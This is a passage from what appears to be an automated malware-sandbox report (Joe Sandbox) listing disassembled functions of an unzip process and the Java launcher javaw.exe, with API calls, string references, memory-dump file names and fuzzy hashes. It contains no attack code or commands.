Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 968904ec962bb6d99ff519ad03e4a65f0fe97d1e04f88e3fcf763963599f829d
Instruction ID: 66bb361abf13d0a71a23622cde7f8bc10fb241b6595cab4483c96084c8c9ab62
Opcode Fuzzy Hash: 968904ec962bb6d99ff519ad03e4a65f0fe97d1e04f88e3fcf763963599f829d
Instruction Fuzzy Hash: 9621AF705042108AD714AF69C58032FB6A0BB4D318F554A6FEA84FB3E1C77D9CC4978B

Function 0042373E Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 44stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00423537
sprintf.MSVCRT ref: 00423586
strlen.MSVCRT ref: 0042374A

Strings

%.*s/%.*sXXXXXX, xrefs: 0042357B

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strlen$sprintf
String ID: %.*s/%.*sXXXXXX
API String ID: 3477162389-1626658478
Opcode ID: 4b44ff38a48e6bb37410bf6f878a13148e151a7e4c78404f1689d0ad7b9db80f
Instruction ID: f928b1a6e46c1be0c424fc04a3f0c81ca7c41e805421b43824a2f6aa773f032a
Opcode Fuzzy Hash: 4b44ff38a48e6bb37410bf6f878a13148e151a7e4c78404f1689d0ad7b9db80f
Instruction Fuzzy Hash: B20169707497219BD320AF15A0402AAB7F1AB88705FC18C2FD88C87301E73DCA858A8A

Function 004231A0 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 004231AD
strstr.MSVCRT ref: 004231C7
strchr.MSVCRT ref: 004231E5

Strings

,, xrefs: 004231DD

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strchrstrlenstrstr
String ID: ,
API String ID: 3365628272-3772416878
Opcode ID: 3338d0335ea044d7954844d95e8e87a24a17afb85595c813be90efd411bd079e
Instruction ID: d1fd357b6fc7cbb2ee0a54a7086ae26d0663d5c69dd15e916c0a53075d82da60
Opcode Fuzzy Hash: 3338d0335ea044d7954844d95e8e87a24a17afb85595c813be90efd411bd079e
Instruction Fuzzy Hash: 7601F9303083208BE730AF25A48623BFBF4AF89351FC44A5FE59483341C27CDA558657

Function 0042294C Relevance: 6.0, APIs: 4, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32 ref: 0042295F
GetProcessHeap.KERNEL32 ref: 00422969
HeapAlloc.KERNEL32 ref: 0042297D
GetLogicalDriveStringsA.KERNEL32 ref: 0042298E

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: DriveHeapLogicalStrings$AllocProcess
String ID:
API String ID: 461270812-0
Opcode ID: ea8fe77239b3d255e7f69cbd6d5ef7e3e26a59623ee9772fd810333330e7456a
Instruction ID: d358f7eb248a75952f04e5ba9043419ce9ee3b0112b06759f67d6a025ca8697d
Opcode Fuzzy Hash: ea8fe77239b3d255e7f69cbd6d5ef7e3e26a59623ee9772fd810333330e7456a
Instruction Fuzzy Hash: 01E012B09093209BC340BF35E54631EBEE0AF44745F82892EE8CC87206D27854598B9B

Function 00408E1C Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 16COMMON

Download Yara Rule

APIs

Part of subcall function 00409B40: CharToOemA.USER32 ref: 00409B83

sprintf.MSVCRT ref: 00408E47

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 00408E20
%, xrefs: 00408E60
jre/jre-1.8/lib/deploy/email.js, xrefs: 00408E28

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Charsprintf
String ID: %$jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 4247116648-1688794020
Opcode ID: 925b85441f0dc4ea3495a50b9401b7d336cae8b48305f233bba60307e1fe8e2b
Instruction ID: 8139a49095b88d53898fb46bf16e80977fc30d516122882031fb796b7473ab40
Opcode Fuzzy Hash: 925b85441f0dc4ea3495a50b9401b7d336cae8b48305f233bba60307e1fe8e2b
Instruction Fuzzy Hash: C4E059B0509710DBC340AF15D50421EBAE0FF84748F91D92EA5C967251CBBC9885DF9F

Function 00425840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetAtomNameA.KERNEL32 ref: 0042585F
abort.MSVCRT ref: 0042589C

Strings

@, xrefs: 00425850

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: AtomNameabort
String ID: @
API String ID: 734581084-2766056989
Opcode ID: 00e17c184841dba8ec235d3d8890990262ae7ccd01712dae2379c21d858629e6
Instruction ID: a3b8bf5dc6ab2d813006efc44f1d6430542645547aa6aa923119fc20b748b845
Opcode Fuzzy Hash: 00e17c184841dba8ec235d3d8890990262ae7ccd01712dae2379c21d858629e6
Instruction Fuzzy Hash: 80F0BB70B0071A8ACB10BFA5D48435AB7A5EB40348F944439DA4997341D3F8E9598749

Function 00420A62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00420A8E

Strings

., xrefs: 00420A83
.lnk, xrefs: 00420A9A

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strrchr
String ID: .$.lnk
API String ID: 3418686817-2551928977
Opcode ID: 9d55ede4feb50f4e393cd15358b871a41356b1eaeb859c5227958ce2d7045c0a
Instruction ID: 442af6b5bfa0373908a682c296b0995ab7e08c378cbea9a1afe8577e76036d3c
Opcode Fuzzy Hash: 9d55ede4feb50f4e393cd15358b871a41356b1eaeb859c5227958ce2d7045c0a
Instruction Fuzzy Hash: 59F082756047228BC710DF249540327B7E0BF84744FCA081DD885A3342D238ED058BE6

Function 0041FAD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041F9D0: GetModuleFileNameA.KERNEL32 ref: 0041F9EC

strrchr.MSVCRT ref: 0041FAEE
strrchr.MSVCRT ref: 0041FB05

Strings

/, xrefs: 0041FAFA

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strrchr$FileModuleName
String ID: /
API String ID: 1156189791-2043925204
Opcode ID: bd3317fe89cfd9ca197218feb643671adb154dd0cb4453cf0c726e73530c9bc5
Instruction ID: 56e2c9b98ca7af10c626a3e8b354b7109ea51caae338cf1fe864a4591e34db7a
Opcode Fuzzy Hash: bd3317fe89cfd9ca197218feb643671adb154dd0cb4453cf0c726e73530c9bc5
Instruction Fuzzy Hash: 9EE0ED702087419BD300BF25E9D132ABBE4AF44384F859C7DE9C84B356D77DC8988766

Analysis Process: javaw.exePID: 6996, Parent PID: 7844COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	98

Executed Functions

Function 00E032EB Relevance: 51.1, APIs: 7, Strings: 22, Instructions: 365
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 00E03546
_strlen.LIBCMT ref: 00E03555
_strcat.LIBCMT ref: 00E0356A
_strlen.LIBCMT ref: 00E03588
_strlen.LIBCMT ref: 00E03596
_strcat.LIBCMT ref: 00E035A7

Part of subcall function 00E05AE8: __vsnprintf.LIBCMT ref: 00E05B1A
Part of subcall function 00E05AE8: MessageBoxA.USER32(00000000,00000000,Java Virtual Machine Launcher,00000010), ref: 00E05B30

Strings

Error: Syntax error in version specification "%s", xrefs: 00E03615
-no-jre-restrict-search, xrefs: 00E033E6
Error: Invalid or corrupt jarfile %s, xrefs: 00E03712
_JAVA_VERSION_SET=, xrefs: 00E0331C, 00E033B3, 00E033D0, 00E033EB, 00E03405, 00E0341C, 00E03432, 00E0345C, 00E03474, 00E0348B, 00E034F1, 00E0371A
-Djava.awt.headless=true, xrefs: 00E03457
JRE-Version = %s, JRE-Restrict-Search = %s Selected = %s, xrefs: 00E03656
-Djava.awt.headless=, xrefs: 00E0346F
-splash:, xrefs: 00E03486
-classpath, xrefs: 00E03417
-jar, xrefs: 00E03400
null, xrefs: 00E0362B, 00E03641
true, xrefs: 00E03642, 00E0364F
Error: Unable to access jarfile %s, xrefs: 00E0370D, 00E0371B
Error: main-class: attribute exceeds system limits of %d bytesError: A fatal exception has occurred. Program will exit., xrefs: 00E036DA
-jre-restrict-search, xrefs: 00E033CB
_JAVA_VERSION_SET, xrefs: 00E03353
false, xrefs: 00E03634
_JAVA_SPLASH_JAR=, xrefs: 00E0358D, 00E03592, 00E035A5
_JAVA_SPLASH_FILE=, xrefs: 00E0354B, 00E03564
-cp, xrefs: 00E0342D
Error: Unable to locate JRE meeting specification "%s", xrefs: 00E03680
-version:, xrefs: 00E033AE

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strlen$_strcat$Message__vsnprintf
String ID: -Djava.awt.headless=$-Djava.awt.headless=true$-classpath$-cp$-jar$-jre-restrict-search$-no-jre-restrict-search$-splash:$-version:$Error: Invalid or corrupt jarfile %s$Error: Syntax error in version specification "%s"$Error: Unable to access jarfile %s$Error: Unable to locate JRE meeting specification "%s"$Error: main-class: attribute exceeds system limits of %d bytesError: A fatal exception has occurred. Program will exit.$JRE-Version = %s, JRE-Restrict-Search = %s Selected = %s$_JAVA_SPLASH_FILE=$_JAVA_SPLASH_JAR=$_JAVA_VERSION_SET$_JAVA_VERSION_SET=$false$null$true
API String ID: 352620604-1483392412
Opcode ID: f3765c816e3cb4419e3e50874aa3028faedfe6c4a8ca8682e4167523c40990de
Instruction ID: 2990249a5f9c806feb6361e378cedb88a761a5db2f1c03cd1a1bcc55301d026c
Opcode Fuzzy Hash: f3765c816e3cb4419e3e50874aa3028faedfe6c4a8ca8682e4167523c40990de
Instruction Fuzzy Hash: 32C11671508311AFD715EF34AC41AAF77E9AF85314F14382EF495BB282EB31DA808756

Function 00E02F15 Relevance: 37.1, APIs: 4, Strings: 17, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E04DED: QueryPerformanceFrequency.KERNEL32(00E36B78), ref: 00E04E00

_strlen.LIBCMT ref: 00E0302B
_strspn.LIBCMT ref: 00E0306A

Part of subcall function 00E04DED: QueryPerformanceCounter.KERNEL32(?), ref: 00E04E27

Part of subcall function 00E04DAE: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E04DE2

Strings

VM_ALIASED_TO, xrefs: 00E03237
ALIASED_TO, xrefs: 00E030AA
%ld micro seconds to parse jvm.cfg, xrefs: 00E032A9
VM_IF_SERVER_CLASS, xrefs: 00E03214
ERROR, xrefs: 00E03132
WARN, xrefs: 00E03105
Warning: Missing server class VM on line %d of `%s', xrefs: 00E0318A
Warning: Unknown VM type on line %d of `%s', xrefs: 00E031B9
KNOWN, xrefs: 00E03090
IGNORE, xrefs: 00E0311D
IF_SERVER_CLASS, xrefs: 00E03147
Warning: Missing VM type on line %d of `%s', xrefs: 00E0307E
name: %s vmType: %s alias: %s, xrefs: 00E03243
jvm.cfg[%d] = ->%s<-, xrefs: 00E031CE
Warning: No leading - on line %d of `%s', xrefs: 00E02FB2
name: %s vmType: %s server_class: %s, xrefs: 00E03220
Error: could not open `%s', xrefs: 00E032D7

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: PerformanceQuery$CounterFrequencyUnothrow_t@std@@@__ehfuncinfo$??2@_strlen_strspn
String ID: name: %s vmType: %s alias: %s$ name: %s vmType: %s server_class: %s$%ld micro seconds to parse jvm.cfg$ALIASED_TO$ERROR$Error: could not open `%s'$IF_SERVER_CLASS$IGNORE$KNOWN$VM_ALIASED_TO$VM_IF_SERVER_CLASS$WARN$Warning: Missing VM type on line %d of `%s'$Warning: Missing server class VM on line %d of `%s'$Warning: No leading - on line %d of `%s'$Warning: Unknown VM type on line %d of `%s'$jvm.cfg[%d] = ->%s<-
API String ID: 1274226703-2085308502
Opcode ID: a5af6008270e5d679495e1b3e88124decbb427d890be3c05622b9218c539b763
Instruction ID: 8f94bd6b9279d2e56a5259973cc5587dc31344bfc760db1b496a889ecf329209
Opcode Fuzzy Hash: a5af6008270e5d679495e1b3e88124decbb427d890be3c05622b9218c539b763
Instruction Fuzzy Hash: 1EA17C7260D3116FE724AF34AC429AB7BD8EF45328F24241DF584B71D2EA319AC58B52

Function 00E04B22 Relevance: 37.0, APIs: 10, Strings: 11, Instructions: 211
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00E04C39

Part of subcall function 00E05702: _strlen.LIBCMT ref: 00E05760

_strlen.LIBCMT ref: 00E04B72
_strlen.LIBCMT ref: 00E04B80
LoadLibraryA.KERNEL32(?,00000000,00000000,false), ref: 00E04BC0
LoadLibraryA.KERNEL32(00000000), ref: 00E04BED
LoadLibraryA.KERNEL32(00000000), ref: 00E04C0E
GetProcAddress.KERNEL32(00000000,preloadStop), ref: 00E04C1F

Part of subcall function 00E05AE8: __vsnprintf.LIBCMT ref: 00E05B1A
Part of subcall function 00E05AE8: MessageBoxA.USER32(00000000,00000000,Java Virtual Machine Launcher,00000010), ref: 00E05B30

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00E04D6B
GetExitCodeThread.KERNEL32(00000000,?), ref: 00E04D77

Strings

J2D_D3D, xrefs: 00E04CCB
Error: Path length exceeds maximum length (PATH_MAX), xrefs: 00E04B8F
\bin\java.dll, xrefs: 00E04BDB
true, xrefs: 00E04D32
\bin\awt.dll, xrefs: 00E04BFC
false, xrefs: 00E04B3B, 00E04CD5, 00E04CDF, 00E04D03
preloadStop, xrefs: 00E04C19
`!, xrefs: 00E04C89
preloadD3D, xrefs: 00E04D57
J2D_D3D_PRELOAD, xrefs: 00E04CF2
\bin\verify.dll, xrefs: 00E04B79, 00E04BA8

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: LibraryLoad_strlen$AddressProc$CodeExitMessageObjectSingleThreadWait__vsnprintf
String ID: Error: Path length exceeds maximum length (PATH_MAX)$J2D_D3D$J2D_D3D_PRELOAD$\bin\awt.dll$\bin\java.dll$\bin\verify.dll$`!$false$preloadD3D$preloadStop$true
API String ID: 3446572236-1846951694
Opcode ID: 392394e4588a9bd702c84fcfd3cdf7fd9598bc37fbf6303f5570b7dc24edf771
Instruction ID: c4f1171655e8165673f4bb79f33b1973191483fbbd09380ec3f8ec1643238535
Opcode Fuzzy Hash: 392394e4588a9bd702c84fcfd3cdf7fd9598bc37fbf6303f5570b7dc24edf771
Instruction Fuzzy Hash: 8151E9F2504309AFE724EB75ED45AAB7BD8EB84354F14292DF641F21C1DB34D8C48A21

Function 00E05DB0 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 114
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E05702: _strlen.LIBCMT ref: 00E05760

_strlen.LIBCMT ref: 00E05DF4
_strlen.LIBCMT ref: 00E05DFC
_strlen.LIBCMT ref: 00E05E08
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000), ref: 00E05E50
_strlen.LIBCMT ref: 00E05E78
_strlen.LIBCMT ref: 00E05E80
_strlen.LIBCMT ref: 00E05E8C
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000), ref: 00E05EDF

Strings

Error: Path length exceeds maximum length (PATH_MAX), xrefs: 00E05E9A
PRT path is %s, xrefs: 00E05EBD
msvcp140.dll, xrefs: 00E05E73
CRT path is %s, xrefs: 00E05E2E
Error: loading: %s, xrefs: 00E05EEE
\bin\msvcp140.dll, xrefs: 00E05EAD
\bin\, xrefs: 00E05DE4, 00E05DF9, 00E05E7D
\bin\vcruntime140.dll, xrefs: 00E05E1E
vcruntime140.dll, xrefs: 00E05DEF

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strlen$LibraryLoad
String ID: CRT path is %s$Error: Path length exceeds maximum length (PATH_MAX)$Error: loading: %s$PRT path is %s$\bin\$\bin\msvcp140.dll$\bin\vcruntime140.dll$msvcp140.dll$vcruntime140.dll
API String ID: 487056130-3119513514
Opcode ID: ef01cb7a77c6a3ecc2ab1fcffbf3a067ac3321015533e318188f02d61774eab2
Instruction ID: 25774e284563075d5446c128f57e43c3586ada66ca436a45ab65772cb6b5ce88
Opcode Fuzzy Hash: ef01cb7a77c6a3ecc2ab1fcffbf3a067ac3321015533e318188f02d61774eab2
Instruction Fuzzy Hash: D531C4B39043096BCA20FBB1EC46EDB73DC9F44754F446825F580F21C2EA75E5C88A62

Function 6D5E8570 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 154
librarystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000), ref: 6D5E857B
GetLastError.KERNEL32(?,?), ref: 6D5E8591
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Can't find dependent libraries,?,?,?), ref: 6D5E85A6
_sopen_dispatch.API-MS-WIN-CRT-STDIO-L1-1-0(?,00008000,00000040,00000000,?,00000000,?,?,?,?), ref: 6D5E85D9
_lseeki64.API-MS-WIN-CRT-STDIO-L1-1-0(?,0000003C,00000000,00000000), ref: 6D5E85FD
_read.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000004), ref: 6D5E861F
_lseeki64.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000), ref: 6D5E863D
_read.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000002), ref: 6D5E865F
_close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6D5E8672

Strings

2tm, xrefs: 6D5E869C
Can't load this .dll (machine code=0x%x) on a %s-bit platform, xrefs: 6D5E86DE, 6D5E86E4
Can't find dependent libraries, xrefs: 6D5E85A0
2tmIA 32, xrefs: 6D5E86AB
Can't load %s-bit .dll on a %s-bit platform, xrefs: 6D5E86C1, 6D5E86C6

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: _lseeki64_read$ErrorLastLibraryLoad_close_sopen_dispatchstrncpy
String ID: Can't find dependent libraries$Can't load %s-bit .dll on a %s-bit platform$Can't load this .dll (machine code=0x%x) on a %s-bit platform$2tm$2tmIA 32
API String ID: 1363437099-1116898270
Opcode ID: a945f2189901dc752c1773892d4cad271afeda9594f2b88efbe8a5de39c226ed
Instruction ID: 0907264df144f360c9cb1b522a12de7637015b0e83d02deb19865a18f5647742
Opcode Fuzzy Hash: a945f2189901dc752c1773892d4cad271afeda9594f2b88efbe8a5de39c226ed
Instruction Fuzzy Hash: 59413472A052252FFB04BA99AC05FAB3B7DEB92355F4044A1FD19E3601EB31D91083E7

Function 00E19329 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E18FCA: CreateFileW.KERNEL32(00E03DFD,00000000,?,00E193D2,?,?,00000000,?,00E193D2,00E03DFD,0000000C), ref: 00E18FE7

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E1943D
__dosmaperr.LIBCMT ref: 00E19444
GetFileType.KERNEL32(00000000), ref: 00E19450
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E1945A
__dosmaperr.LIBCMT ref: 00E19463
CloseHandle.KERNEL32(00000000), ref: 00E19483
CloseHandle.KERNEL32(?), ref: 00E195D0
GetLastError.KERNEL32 ref: 00E19602
__dosmaperr.LIBCMT ref: 00E19609

Strings

H, xrefs: 00E1958E

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 7ac90fe91553d3f5149d0b3ebac8d7ffc138b72533f8d251d1f8d3b48f293454
